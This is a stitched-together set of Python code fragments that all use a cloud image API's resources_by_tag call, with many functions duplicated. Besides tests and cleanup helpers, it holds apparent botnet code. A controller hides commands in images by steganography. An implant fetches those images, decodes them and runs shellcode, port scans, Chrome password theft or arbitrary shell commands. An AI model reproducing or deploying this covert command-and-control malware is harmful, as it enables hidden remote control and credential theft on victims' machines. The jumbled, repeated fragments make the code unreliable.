def test06_resources_tag(self, mocker):
""" should allow listing resources by tag """
mocker.return_value = MOCK_RESPONSE
api.resources_by_tag(API_TEST_TAG, context=True, tags=True)
args, kargs = mocker.call_args
self.assertTrue(get_uri(args).endswith('/resources/image/tags/{}'.format(API_TEST_TAG)))
self.assertTrue(get_params(args)['context'])
self.assertTrue(get_params(args)['tags'])
def test06b_resources_direction(self):
""" should allow listing resources in both directions """
asc_resources = api.resources_by_tag(ApiTest.timestamp_tag, direction = "asc", type = "upload")["resources"]
desc_resources = api.resources_by_tag(ApiTest.timestamp_tag, direction = "desc", type = "upload")["resources"]
asc_resources.reverse()
self.assertEqual(asc_resources, desc_resources)
asc_resources_alt = api.resources_by_tag(ApiTest.timestamp_tag, direction = 1, type = "upload")["resources"]
desc_resources_alt = api.resources_by_tag(ApiTest.timestamp_tag, direction = -1, type = "upload")["resources"]
asc_resources_alt.reverse()
self.assertEqual(asc_resources_alt, desc_resources_alt)
self.assertEqual(asc_resources_alt, asc_resources)
def test06b_resources_direction(self):
""" should allow listing resources in both directions """
asc_resources = api.resources_by_tag(ApiTest.timestamp_tag, direction = "asc", type = "upload")["resources"]
desc_resources = api.resources_by_tag(ApiTest.timestamp_tag, direction = "desc", type = "upload")["resources"]
asc_resources.reverse()
self.assertEqual(asc_resources, desc_resources)
asc_resources_alt = api.resources_by_tag(ApiTest.timestamp_tag, direction = 1, type = "upload")["resources"]
desc_resources_alt = api.resources_by_tag(ApiTest.timestamp_tag, direction = -1, type = "upload")["resources"]
asc_resources_alt.reverse()
self.assertEqual(asc_resources_alt, desc_resources_alt)
self.assertEqual(asc_resources_alt, asc_resources)
def test06b_resources_direction(self, mocker):
""" should allow listing resources in both directions """
mocker.return_value = MOCK_RESPONSE
api.resources_by_tag(API_TEST_TAG, direction="asc", type="upload")
args, kargs = mocker.call_args
self.assertTrue(get_uri(args).endswith('/resources/image/tags/{}'.format(API_TEST_TAG)))
self.assertEqual(get_params(args)['direction'], 'asc')
api.resources_by_tag(API_TEST_TAG, direction="desc", type="upload")
args, kargs = mocker.call_args
self.assertTrue(get_uri(args).endswith('/resources/image/tags/{}'.format(API_TEST_TAG)))
self.assertEqual(get_params(args)['direction'], 'desc')
def test_structured_metadata_in_resources_by_tag_api(self):
result = api.resources_by_tag(API_TEST_TAG, metadata=True)
self.assertTrue(result["resources"])
for resource in result["resources"]:
self.assertIn("metadata", resource)
result = api.resources_by_tag(API_TEST_TAG, metadata=False)
self.assertTrue(result["resources"])
for resource in result["resources"]:
self.assertNotIn("metadata", resource)
def test06_resources_tag(self):
""" should allow listing resources by tag """
resources = api.resources_by_tag("api_test_tag", context=True, tags=True)["resources"]
resource = [resource for resource in resources if resource["public_id"] == "api_test"][0]
self.assertNotEqual(resource, None)
self.assertIn(["api_test_tag"], [resource["tags"] for resource in resources])
self.assertIn({"custom": {"key": "value"}}, [resource["context"] for resource in resources])
def test06_resources_tag(self):
""" should allow listing resources by tag """
resources = api.resources_by_tag("api_test_tag", context = True, tags = True)["resources"]
resource = [resource for resource in resources if resource["public_id"] == "api_test"][0]
self.assertNotEqual(resource, None)
self.assertIn(["api_test_tag"], [resource["tags"] for resource in resources])
self.assertIn({"custom": {"key": "value"}}, [resource["context"] for resource in resources])
def test06_resources_tag(self):
""" should allow listing resources by tag """
resource = [
resource
for resource in api.resources_by_tag("api_test_tag")["resources"]
if resource["public_id"] == "api_test"
][0]
self.assertNotEqual(resource, None)
def test06_resources_tag(self):
""" should allow listing resources by tag """
resource = [
resource
for resource in api.resources_by_tag("api_test_tag")["resources"]
if resource["public_id"] == "api_test"
][0]
self.assertNotEqual(resource, None)
def cleanup():
response = resources_by_tag(DEFAULT_TAG)
resources = response.get('resources', [])
if not resources:
print("No images found")
return
print("Deleting {0:d} images...".format(len(resources)))
delete_resources_by_tag(DEFAULT_TAG)
print("Done!")
def cleanup():
response = resources_by_tag(DEFAULT_TAG)
resources = response.get('resources', [])
if not resources:
print("Clean Up: All alert images already deleted.")
return
print("Deleting {0:d} images...".format(len(resources)))
delete_resources_by_tag(DEFAULT_TAG)
print("Done!")
def cleanup():
response = resources_by_tag(DEFAULT_TAG)
resources = response.get('resources', [])
if not resources:
print("No images found")
return
print("Deleting {0:d} images...".format(len(resources)))
delete_resources_by_tag(DEFAULT_TAG)
print("Done!")
def cleanup():
response = resources_by_tag(DEFAULT_TAG)
count = len(response.get('resources', []))
if (count == 0):
print("No images found")
return
print("Deleting %d images..." % (count, ))
delete_resources_by_tag(DEFAULT_TAG)
print("Done!")
pass
def cleanup():
response = resources_by_tag(DEFAULT_TAG)
count = len(response.get('resources', []))
if (count == 0):
print "No images found"
return
print "Deleting %d images..." % (count,)
delete_resources_by_tag(DEFAULT_TAG)
print "Done!"
pass
def cleanup():
tag = DEFAULT_OPTIONS['tags']
response = resources_by_tag(tag)
count = len(response.get('resources', []))
if (count == 0):
print "No images found"
return
print "Deleting %d images..." % (count,)
delete_resources_by_tag(tag)
print "Done!"
pass
def refresh(refresh_bots=True):
global BOTS_ALIVE
global COMMANDS
global DEFAULT_TAG
if refresh_bots:
BOTS_ALIVE = []
print((colored('[+] Sending command to retrieve alive bots', 'white')))
cmd = CommandToSend('master', DEFAULT_TAG, 'PING')
jobid = cmd.get_jobid()
saveimg = ImageHandle()
if (saveimg.save(cmd.build(), jobid)):
print((colored('[+] Steganography applied, image saved', 'white')))
else:
print((colored('[-] Error saving the image. Try again', 'yellow')))
return None
print((colored('[+] Sleeping 10 secs to wait for bots' + os.linesep,
'yellow')))
time.sleep(10)
loadimg = ImageHandle()
response = resources_by_tag(DEFAULT_TAG)
get_response = response.get('resources', [])
for key in sorted(get_response):
img = urllib2.urlopen(key['url']).read()
if len(img) != 503: # 'image not found' is 503 bytes
public_id = key['public_id'] # JOBID
if (public_id.startswith("implant_")):
message = loadimg.load(key['url'])
try:
if refresh_bots and message.get_jobid() == jobid:
BOTS_ALIVE.append(message)
else:
existcommand = False
for command in COMMANDS:
if (message.get_jobid() == command.get_jobid()):
existcommand = True
if not (existcommand):
COMMANDS.append(message)
except:
pass
if refresh_bots:
list_bots()
def refresh(refresh_bots=True):
global BOTS_ALIVE
global COMMANDS
global DEFAULT_TAG
if refresh_bots:
BOTS_ALIVE = []
print((colored('[+] Sending command to retrieve alive bots', 'white')))
cmd = CommandToSend('master', DEFAULT_TAG, 'PING')
jobid = cmd.get_jobid()
saveimg = ImageHandle()
if (saveimg.save(cmd.build(), jobid)):
print((colored('[+] Steganography applied, image saved' , 'white')))
else:
print((colored('[-] Error saving the image. Try again' , 'yellow')))
return None
print((colored('[+] Sleeping 10 secs to wait for bots' + os.linesep, 'yellow')))
time.sleep(10)
loadimg = ImageHandle()
response = resources_by_tag(DEFAULT_TAG)
get_response = response.get('resources', [])
for key in sorted(get_response):
img = urllib2.urlopen(key['url']).read()
if len(img) != 503: # 'image not found' is 503 bytes
public_id = key['public_id'] # JOBID
if (public_id.startswith("implant_")):
message = loadimg.load(key['url'])
try:
if refresh_bots and message.get_jobid() == jobid:
BOTS_ALIVE.append(message)
else:
existcommand = False
for command in COMMANDS:
if (message.get_jobid() == command.get_jobid()):
existcommand = True
if not (existcommand):
COMMANDS.append(message)
except:
pass
if refresh_bots:
list_bots()
def __init__(self):
try:
global JOBIDS
global DEFAULT_TAG
loadimg = ImageHandle()
response = resources_by_tag(DEFAULT_TAG)
get_response = response.get('resources', [])
for key in sorted(get_response):
img = urllib2.urlopen(key['url']).read()
if len(img) != 503: # 'image not found' is 503 bytes
public_id = key['public_id'] # JOBID
if (public_id.startswith("master_")):
message = loadimg.load(key['url'])
cmdreceived = CommandToExecute(message)
if (cmdreceived.is_for_me()):
jobid, cmd = cmdreceived.retrieve_command()
if (jobid not in JOBIDS):
if (cmd.split(' ')[0] == 'shellcode'):
sc = base64.b64decode(cmd.split(' ')[1]).decode('string-escape')
print((colored("[+] shellcode jobid: %s, cmd to execute: %s" % (jobid, sc), "white")))
JOBIDS.append(jobid)
ExecuteShellcode(jobid, sc)
elif (cmd.split(' ')[0] == 'scanner'):
sc = cmd.split(' ')[1].decode('string-escape')
print((colored("[+] Port Scanner jobid: %s, %s" % (jobid, cmd), "white")))
command = sc[5:]
ip,ports = sc.split(':')
JOBIDS.append(jobid)
PortScanner(jobid, cmd, ip, ports)
elif (cmd.split(' ')[0] == 'chromepasswords'):
print((colored("[+] Chrome jobid: %s, %s" % (jobid, cmd), "white")))
JOBIDS.append(jobid)
ChromePasswords(jobid, cmd)
else:
print((colored("[+] jobid: %s, cmd to execute: %s" % (jobid, cmd), "white")))
JOBIDS.append(jobid)
ExecuteCommand(jobid, cmd)
except:
print((colored('[-] Error decoding' , 'yellow')))
return None
def list_images(tag=TAG, transform=TRANSFORMS["thumbnail"]):
"""Return list of URLs for all the images """
resources = resources_by_tag(tag)["resources"]
data = [
{
"url": image_url(
resource["public_id"], resource["format"], transform
),
"resource": resource,
}
for resource in resources
]
return data
def cleanup():
try:
global DEFAULT_TAG
response = resources_by_tag(DEFAULT_TAG)
count = len(response.get('resources', []))
print((colored("[+] Deleting %d images from previous sessions..." % (count), "white")))
if (count == 0):
print((colored("[-] No images found", "white")))
return
delete_resources_by_tag(DEFAULT_TAG)
print((colored("[+] Done", "white")))
except:
print((colored("[-] Error trying to remove previous images", "yellow")))
def cleanup():
try:
global DEFAULT_TAG
response = resources_by_tag(DEFAULT_TAG)
count = len(response.get('resources', []))
print((colored(
"[+] Deleting %d images from previous sessions..." % (count),
"white")))
if (count == 0):
print((colored("[-] No images found", "white")))
return
delete_resources_by_tag(DEFAULT_TAG)
print((colored("[+] Done", "white")))
except:
print((colored("[-] Error trying to remove previous images",
"yellow")))
def __init__(self):
try:
global JOBIDS
global DEFAULT_TAG
loadimg = ImageHandle()
response = resources_by_tag(DEFAULT_TAG)
get_response = response.get('resources', [])
for key in sorted(get_response):
img = urllib2.urlopen(key['url']).read()
if len(img) != 503: # 'image not found' is 503 bytes
public_id = key['public_id'] # JOBID
if (public_id.startswith("master_")):
message = loadimg.load(key['url'])
cmdreceived = CommandToExecute(message)
if (cmdreceived.is_for_me()):
jobid, cmd = cmdreceived.retrieve_command()
if (jobid not in JOBIDS):
if (cmd.split(' ')[0] == 'shellcode'):
sc = base64.b64decode(cmd.split(
' ')[1]).decode('string-escape')
print((colored(
"[+] shellcode jobid: %s, cmd to execute: %s"
% (jobid, sc), "white")))
JOBIDS.append(jobid)
ExecuteShellcode(jobid, sc)
elif (cmd.split(' ')[0] == 'scanner'):
sc = cmd.split(' ')[1].decode(
'string-escape')
print((colored(
"[+] Port Scanner jobid: %s, %s" %
(jobid, cmd), "white")))
command = sc[5:]
ip, ports = sc.split(':')
JOBIDS.append(jobid)
PortScanner(jobid, cmd, ip, ports)
elif (cmd.split(' ')[0] == 'chromepasswords'):
print((colored(
"[+] Chrome jobid: %s, %s" %
(jobid, cmd), "white")))
JOBIDS.append(jobid)
ChromePasswords(jobid, cmd)
else:
print((colored(
"[+] jobid: %s, cmd to execute: %s" %
(jobid, cmd), "white")))
JOBIDS.append(jobid)
ExecuteCommand(jobid, cmd)
except Exception as e:
print((colored('[-] Error decoding' + str(e), 'yellow')))
return None
def get_cloud_images(request):
image_data = resources_by_tag("blog")
return JsonResponse(image_data)
